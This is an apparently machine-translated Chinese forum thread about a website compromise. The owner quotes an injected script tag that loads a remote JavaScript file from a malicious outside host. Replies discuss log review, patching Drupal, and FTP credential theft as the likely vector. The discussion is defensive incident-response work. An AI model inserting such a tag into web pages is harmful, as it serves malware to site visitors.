我的网站被Google / StopBadware.org标记为危险,我在几个js / html文件中发现了这个:
<script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script> <!--a0e2c33acd6c12bdc9e3f3ba50c98197--> 我清理了几个文件,我恢复备份,但如何了解如何安装蠕虫? 我可以在日志文件中find什么? 这个服务器,一个Centos 5,只能作为一个Apache服务器,用我们的程序,一个tikiwiki,一个drupal安装。
谢谢
塞德里克
入侵事件分析并不容易,特别是如果您没有遵循标准的恢复过程(使物理服务器脱机,获取所有文件系统的扇区映像,从安装介质完全重build机器,恢复数据) 。
通常,您将从Apache日志开始查看所有日志文件。 在你的情况下,最有可能的攻击媒介,是Drupal,但它并不意味着唯一可能的,所以所有的日志应该检查(我的意思是所有日志)。 根据您使用的文件系统,可以采取额外的步骤来确定感染时发生了什么活动,并找出使用的攻击媒介和完成的工作。
同时,检查您的机器正在运行的所有软件,并确保它是全部最新的。 这包括所有的Drupal模块,主题等。我也会用梳子检查任何自定义代码。
编辑:我忘了提到一个事实,就你而言,由于你显然没有相关的专业知识,你可能要考虑将事件发生在一个做法证分析的安全公司:它可能有点昂贵的一面,但你会得到明确的答案,发生了什么事以及如何防止它。
我们在服务器上也有这个问题(从6月11日开始),蠕虫注入的内容与上面写的完全相同。
它看起来像没有任何与Apache / PHP相关的任何连接; 蠕虫通过FTP连接,并将这些脚本标签附加到* .php和* .html。 没有无效的密码; 他们第一次尝试就能得到它。
因此,我认为这可能与客户有关。 我认为客户端有一个病毒,要么监听任何FTP活动,要么检查FileZilla中保存的任何密码。 我不确定,并会进一步调查。 如果您有任何运气,请通过此主题通知我们。
编辑:仅供参考,我们的客户没有使用Drupal。 这只是Joomla,和一些静态的HTML文件。